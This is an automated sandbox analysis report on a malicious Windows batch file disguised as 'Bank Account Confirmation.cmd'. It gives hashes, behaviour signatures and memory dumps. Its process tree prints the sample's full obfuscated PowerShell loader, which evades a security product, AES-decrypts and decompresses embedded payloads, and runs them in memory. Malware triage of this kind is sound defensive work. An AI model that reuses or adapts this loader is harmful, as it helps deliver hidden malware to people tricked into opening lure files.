Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15/10/2024, 01:12

General

  • Target

    Bank Account Confirmation.cmd

  • Size

    75KB

  • MD5

    a1f610b023f0ee41cf49ff8f1c65cd69

  • SHA1

    9eb5aef9ec56315b68125fab688e7da0f1c047c7

  • SHA256

    b88f42d17c704ef4c967e9a1dc44df19c78f7778b4dd8b804d672bb8dc4b388b

  • SHA512

    9ac1b320dba8ad3e2649d536c7d5c2c00bf7e392c067f639cba722128e984f914920bb9a32502d27005359fcfb6e353c9f1a70eb421f158eb09fcadce8b4ee38

  • SSDEEP

    1536:ZVMZoZknhzcJZwc+ADr8syGShOY3C+BuRV0B/FHP3vfcC:AZvh+fDr7YuRg/FHvnd

Score
3/10

Malware Config

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Bank Account Confirmation.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1600
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Bank Account Confirmation.cmd';$qYMd='EoWHEloWHEemoWHEeoWHEntoWHEAoWHEtoWHE'.Replace('oWHE', ''),'IJVJPnJVJPvoJVJPkJVJPeJVJP'.Replace('JVJP', ''),'TrAkDFansAkDFfoAkDFrmFAkDFinAkDFalBAkDFloAkDFckAkDF'.Replace('AkDF', ''),'ReaaYnZdLiaYnZnaYnZesaYnZ'.Replace('aYnZ', ''),'CoLAKKpyTLAKKoLAKK'.Replace('LAKK', ''),'DxJdEecxJdEoxJdEmxJdEprxJdEesxJdEsxJdE'.Replace('xJdE', ''),'LoZUlYadZUlY'.Replace('ZUlY', ''),'FTsZgroTsZgmTsZgBaTsZgse6TsZg4StTsZgrinTsZggTsZg'.Replace('TsZg', ''),'GetAeTiCuAeTirAeTirAeTientAeTiPrAeTiocAeTiesAeTisAeTi'.Replace('AeTi', ''),'EntfOQpryfOQpPoifOQpnfOQptfOQp'.Replace('fOQp', ''),'ChOzQnanOzQngeOzQnEOzQnxtOzQnenOzQnsioOzQnnOzQn'.Replace('OzQn', ''),'MayuqciyuqcnMyuqcodyuqcuyuqcleyuqc'.Replace('yuqc', ''),'CJcmOreJcmOaJcmOteJcmODJcmOeJcmOcrJcmOypJcmOtorJcmO'.Replace('JcmO', ''),'SplJpLxitJpLx'.Replace('JpLx', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($qYMd[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function TNxwU($DROrS){$satGT=[System.Security.Cryptography.Aes]::Create();$satGT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$satGT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$satGT.Key=[System.Convert]::($qYMd[7])('PYD5Zx79/5XXaOZ9KVLVpuLIBDRZmVJg6jUpiwmMiH8=');$satGT.IV=[System.Convert]::($qYMd[7])('NFMa47iGxlGH6wwsNxEAUA==');$EirGA=$satGT.($qYMd[12])();$GpYEP=$EirGA.($qYMd[2])($DROrS,0,$DROrS.Length);$EirGA.Dispose();$satGT.Dispose();$GpYEP;}function wpxHz($DROrS){$KPEoo=New-Object System.IO.MemoryStream(,$DROrS);$hqSSH=New-Object System.IO.MemoryStream;$yRCmC=New-Object System.IO.Compression.GZipStream($KPEoo,[IO.Compression.CompressionMode]::($qYMd[5]));$yRCmC.($qYMd[4])($hqSSH);$yRCmC.Dispose();$KPEoo.Dispose();$hqSSH.Dispose();$hqSSH.ToArray();}$RvQfJ=[System.IO.File]::($qYMd[3])([Console]::Title);$CoOkQ=wpxHz (TNxwU ([Convert]::($qYMd[7])([System.Linq.Enumerable]::($qYMd[0])($RvQfJ, 5).Substring(2))));$dNNEQ=wpxHz (TNxwU ([Convert]::($qYMd[7])([System.Linq.Enumerable]::($qYMd[0])($RvQfJ, 6).Substring(2))));[System.Reflection.Assembly]::($qYMd[6])([byte[]]$dNNEQ).($qYMd[9]).($qYMd[1])($null,$null);[System.Reflection.Assembly]::($qYMd[6])([byte[]]$CoOkQ).($qYMd[9]).($qYMd[1])($null,$null); "
      2⤵
        PID:2108
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1708

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1708-2-0x0000000074601000-0x0000000074602000-memory.dmp

      Filesize

      4KB

    • memory/1708-3-0x0000000074600000-0x0000000074BAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1708-4-0x0000000074600000-0x0000000074BAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1708-5-0x0000000074600000-0x0000000074BAB000-memory.dmp

      Filesize

      5.7MB

    • memory/1708-6-0x0000000074600000-0x0000000074BAB000-memory.dmp

      Filesize

      5.7MB